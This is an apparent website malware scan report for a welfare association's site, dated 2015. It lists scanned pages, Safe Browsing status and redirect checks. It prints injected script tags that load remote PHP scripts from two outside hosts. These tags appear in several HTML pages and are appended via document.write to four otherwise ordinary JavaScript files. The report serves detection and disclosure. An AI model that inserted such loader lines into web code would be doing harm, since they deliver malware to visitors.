Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=awalwelfareassociation.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://awalwelfareassociation.com/ | 200 OK Content-Length: 19585 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://el.han.kr/7pxyczh9.php?id=6889774"></script> | ||
http://awalwelfareassociation.com/_wp_scripts/jsFlashVer.js | 200 OK Content-Length: 7685 Content-Type: text/javascript | clean |
http://awalwelfareassociation.com/_wp_scripts/jspngfix.js | 200 OK Content-Length: 874 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var supported = !/Gecko/.test(navigator.userAgent) && !/Opera/.test(navigator.userAgent) && /MSIE (5\.5|6)/.test(navigator.userAgent) && navigator.platform == "Win32"; function OnLoadPngFix() { if(!supported) return; if(!event.srcElement) return; var src=event.srcElement.src; if(!src) return; if(!new RegExp(blankSrc).test(src)) { if(/\.png$/.test(src.toLowerCase())) { src = src.replace(/\(/g, "(" ); src = src.replace(/\)/g, ")" ); event.srcElement.src = blankSrc; event.srcElement.runtimeStyle.filter = "progid:DXImageTransform.Microsoft.AlphaImageLoader(src='" src "',sizingMethod='scale')"; } else { event.srcElement.runtimeStyle.filter = "";} } } document.write('<script src="http://mirakuya-tsuki.sakura.ne.jp/css/OcRhdkkK.php" type="text/javascript"></script>') Antivirus reports:
| ||
http://awalwelfareassociation.com/_wp_scripts/jsValidation.js | 200 OK Content-Length: 1677 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function ValidateEmail(sEmail) { var reEmail=/^(. )@(. )$/; var reQuotedString="(\"[^\"]*\")"; var reIPDomain=/^\[(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})\]$/; var reValidCharString="\[^\\s\\(\\)><@,;:\\\\\\\"\\.\\[\\]\] "; var reGetString="(" reValidCharString "|" reQuotedString ")"; var reUserName=new RegExp("^" reGetString "(\\." reGetString ")*$"); var reDomain=new RegExp("^" reValidCharString "(\\." reValidCharString ")*$"); } } return true; } function ltrim(str, chars) { chars = chars || "\\s"; return str.replace(new RegExp("^[" chars "] ", "g"), ""); } function rtrim(str, chars) { chars = chars || "\\s"; return str.replace(new RegExp("[" chars "] $", "g"), ""); } document.write('<script src="http://mirakuya-tsuki.sakura.ne.jp/css/OcRhdkkK.php" type="text/javascript"></script>') Antivirus reports:
| ||
http://awalwelfareassociation.com/_wp_scripts/jsMenus.js | 200 OK Content-Length: 9087 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) wp_menus.prototype.m_type = 0; wp_menus.prototype.m_delay = 500; wp_menus.prototype.m_bordersize = 1; wp_menus.prototype.m_fontsize = 12; wp_menus.prototype.m_filterOpacity = 100; wp_menus.prototype.m_mozOpacity = 1; wp_menus.prototype.m_width = 0; wp_menus.prototype.m_padding = '3px 10px 3px 10px'; wp_menus.prototype.m_fontfamily = 'sans-serif'; wp_menus.prototype.m_bordercolor = '#000000'; wp_menus.prototype.m_bkgndcolor = 'transparent'; wp_menus.pro else { if(this.m_firstpopup == 1) top = top (p.offsetHeight - e.offsetHeight) / 2; else if(this.m_firstpopup == 2) top = (top p.offsetHeight) - e.offsetHeight; }} e.style.top = top "px"; e.style.left = left "px"; e.style.visibility = "visible"; } document.write('<script src="http://mirakuya-tsuki.sakura.ne.jp/css/OcRhdkkK.php" type="text/javascript"></script>') Antivirus reports:
| ||
http://awalwelfareassociation.com/_wp_scripts/jsRollover.js | 200 OK Content-Length: 2034 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) rolls = new Array(); numRolls=0; function PPFindObj(n, d) { var p,i,x; if( !d ) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) { d=parent.frames[n.substring(p 1)].document; n=n.substring(0,p); } if( !(x=d[n])&&d.all ) x=d.all[n]; for( i=0;!x&&i<d.forms.length;i ) x=d.forms[i][n]; for( i=0;!x&&d.layers&&i<d.layers.length;i ) x=PPFindObj(n,d.layers[i].document); return x; } fun this.imgDownOver = new Image(); this.imgDownOver.src = downover; this.down = initDown; this.over = false; this.radio = radio; } function PPImgInit( name,normal,over,down,downover,initDown,radio ) { if (document.images) rolls[numRolls ] = new PPImg(name,normal,over,down,downover,initDown,radio); } document.write('<script src="http://mirakuya-tsuki.sakura.ne.jp/css/OcRhdkkK.php" type="text/javascript"></script>') Antivirus reports:
| ||
http://awalwelfareassociation.com/index.html | 200 OK Content-Length: 19585 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://el.han.kr/7pxyczh9.php?id=6889774"></script> | ||
http://awalwelfareassociation.com/about.html | 200 OK Content-Length: 15230 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://el.han.kr/7pxyczh9.php?id=6889767"></script> | ||
http://awalwelfareassociation.com/news.html | 200 OK Content-Length: 15748 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://el.han.kr/7pxyczh9.php?id=6889775"></script> | ||
http://awalwelfareassociation.com/solutions.html | 200 OK Content-Length: 12902 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://el.han.kr/7pxyczh9.php?id=6889780"></script> | ||
http://awalwelfareassociation.com/contact.html | 200 OK Content-Length: 16248 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://el.han.kr/7pxyczh9.php?id=6889770"></script> | ||
http://awalwelfareassociation.com/diary.html | 200 OK Content-Length: 12472 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://el.han.kr/7pxyczh9.php?id=6889772"></script> | ||
http://awalwelfareassociation.com/awal-function-2013.pdf | 200 OK Content-Length: 172751 Content-Type: application/pdf | clean |
http://awalwelfareassociation.com/test404page.js | 404 Not Found Content-Length: 407 Content-Type: text/html | clean |
http://awalwelfareassociation.com/on-sitetraining.html | 200 OK Content-Length: 9456 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://el.han.kr/7pxyczh9.php?id=6889776"></script> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: awalwelfareassociation.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 10 Jan 2015 22:54:27 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 19585
Content-Type: text/html
Last-Modified: Sat, 01 Nov 2014 11:19:02 GMT
...19585 bytes of data.
GET / HTTP/1.1
Host: awalwelfareassociation.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 10 Jan 2015 22:54:27 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 19585
Content-Type: text/html
Last-Modified: Sat, 01 Nov 2014 11:19:02 GMT
...19585 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: awalwelfareassociation.com
Referer: http://www.google.com/search?q=awalwelfareassociation.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: awalwelfareassociation.com
Referer: http://www.google.com/search?q=awalwelfareassociation.com
Result:
The result is similar to the first query. There are no suspicious redirects found.